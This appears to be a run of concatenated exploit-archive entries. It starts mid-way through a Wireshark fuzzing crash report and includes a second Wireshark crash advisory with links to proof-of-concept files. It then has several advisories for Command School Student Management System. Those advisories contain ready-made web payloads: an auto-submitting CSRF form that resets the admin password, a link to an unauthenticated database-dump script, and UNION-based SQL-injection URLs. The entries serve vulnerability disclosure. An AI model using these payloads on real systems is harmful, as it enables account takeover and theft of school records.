#26 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#28 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0x7f148350c33b in dissect_record wireshark/epan/packet.c:501:3
#31 0x7f14834ba3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x5264eb in process_packet wireshark/tshark.c:3728:5
#33 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#34 0x515daf in main wireshark/tshark.c:2197:13
0x7f148fad2900 is located 32 bytes to the left of global variable 'ett' defined in 'packet-zbee-zcl-ha.c:1391:18' (0x7f148fad2920) of size 136
0x7f148fad2900 is located 0 bytes to the right of global variable 'ett_zbee_zcl_appl_evtalt_alerts_struct' defined in 'packet-zbee-zcl-ha.c:698:13' (0x7f148fad28e0) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-ha.c:889:21 in dissect_zcl_appl_evtalt_get_alerts_rsp
Shadow bytes around the buggy address:
0x0fe311f524d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f524e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f524f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe311f52520:[f9]f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52530: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0fe311f52540: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0fe311f52550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8856==ABORTING
--- cut ---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38995.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=662
The following crash due to an asserion failure can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
ERROR:wmem_core.c:50:wmem_alloc: assertion failed: (allocator->in_scope)
Program received signal SIGABRT, Aborted.
0x00007fffe1c70cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) where
#0 0x00007fffe1c70cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007fffe1c740d8 in __GI_abort () at abort.c:89
#2 0x00007fffe3707165 in g_assertion_message () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#3 0x00007fffe37071fa in g_assertion_message_expr () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#4 0x00007fffee6b49f5 in wmem_alloc (allocator=<optimized out>, size=<optimized out>) at wmem_core.c:50
#5 0x00007fffeb0f7d40 in wmem_utoa (allocator=0x60700000bd90, port=512) at addr_resolv.c:604
#6 0x00007fffeb0f7c70 in udp_port_to_display (allocator=0x60700000bd90, port=512) at addr_resolv.c:2901
#7 0x00007fffec2e1998 in ipmi_fmt_udpport (s=0x7ffffffface0 "\030\366!\364\377\177", v=512)
at packet-ipmi.c:1283
#8 0x00007fffeb25d6ff in fill_label_number (fi=0x7ffe90b4c2c0,
label_str=0x7fffffffb5e0 "1111 11.. = Sequence Number: 0x3f", is_signed=0) at proto.c:7083
#9 0x00007fffeb2505e2 in proto_item_fill_label (fi=0x7ffe90b4c2c0,
label_str=0x7fffffffb5e0 "1111 11.. = Sequence Number: 0x3f") at proto.c:6651
#10 0x00007fffeb1f1799 in proto_tree_print_node (node=0x7ffe90b4c330, data=0x7fffffffc480) at print.c:164
#11 0x00007fffeb207927 in proto_tree_children_foreach (tree=0x7ffe90b4bd70,
func=0x7fffeb1f10e0 <proto_tree_print_node>, data=0x7fffffffc480) at proto.c:655
#12 0x00007fffeb1f2d93 in proto_tree_print_node (node=0x7ffe90b4bd70, data=0x7fffffffc480) at print.c:219
#13 0x00007fffeb207927 in proto_tree_children_foreach (tree=0x7ffe90b4b0e0,
func=0x7fffeb1f10e0 <proto_tree_print_node>, data=0x7fffffffc480) at proto.c:655
#14 0x00007fffeb1f2d93 in proto_tree_print_node (node=0x7ffe90b4b0e0, data=0x7fffffffc480) at print.c:219
#15 0x00007fffeb207927 in proto_tree_children_foreach (tree=0x619000152ef0,
func=0x7fffeb1f10e0 <proto_tree_print_node>, data=0x7fffffffc480) at proto.c:655
#16 0x00007fffeb1f1013 in proto_tree_print (print_args=0x7fffffffc6a0, edt=0x61300000de80,
output_only_tables=0x0, stream=0x602000340c10) at print.c:133
#17 0x000000000052b913 in print_packet (cf=0x14ac0c0 <cfile>, edt=0x61300000de80) at tshark.c:4132
#18 0x00000000005266ff in process_packet (cf=0x14ac0c0 <cfile>, edt=0x61300000de80, offset=24,
whdr=0x61400000f060, pd=0x61b000012d80 "", tap_flags=0) at tshark.c:3742
#19 0x000000000051f961 in load_cap_file (cf=0x14ac0c0 <cfile>, save_file=0x0, out_file_type=2,
out_file_name_res=0, max_packet_count=0, max_byte_count=0) at tshark.c:3484
#20 0x0000000000515db0 in main (argc=3, argv=0x7fffffffe248) at tshark.c:2197
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11831. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38994.zip
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
[Change Password Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://www.example.com/sw/admin_change_password.php">
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="action" value="update" />
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
##############
VULNERABILITY
##############
/Backup/backup_ray2.php (LINE: 78-126)
-----------------------------------------------------------------------------
// SET THE NAME OF THE BACKUP WITH A TIMESTAMP
$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt';
$fp = fopen($bkup, "w");
// GET THE LIST OF TABLES
$sql = "SHOW TABLES";
$res = mysql_query($sql);
if (!$res) die( mysql_error() );
if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" );
while ($s = mysql_fetch_array($res))
{
$tables[] = $s[0];
}
// ITERATE OVER THE LIST OF TABLES
foreach ($tables as $table)
{
// WRITE THE DROP TABLE STATEMENT
fwrite($fp,"DROP TABLE `$table`;\n");
// GET THE CREATE TABLE STATEMENT
$res = mysql_query("SHOW CREATE TABLE `$table`");
if (!$res) die( mysql_error() );
$cre = mysql_fetch_array($res);
$cre[1] .= ";";
$txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE
fwrite($fp, $txt . "\n");
// GET THE TABLE DATA
$data = mysql_query("SELECT * FROM `$table`");
$num = mysql_num_fields($data);
while ($row = mysql_fetch_array($data))
{
// MAKE INSERT STATEMENTS FOR ALL THE VALUES
$txt = "INSERT INTO `$table` VALUES(";
for ($i=0; $i < $num; $i++)
{
$txt .= "'".mysql_real_escape_string($row[$i])."', ";
}
$txt = substr($txt, 0, -2);
fwrite($fp, $txt . ");\n");
}
}
// ALL DONE
fclose($fp);
-----------------------------------------------------------------------------
#####################################################
EXPLOIT
#####################################################
<html>
<title>Iphobos Blog</title>
<label><a href="http://www.example.com/sw/backup/backup_ray2.php" class="button
white">Backup Download</a></label>
</html>
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()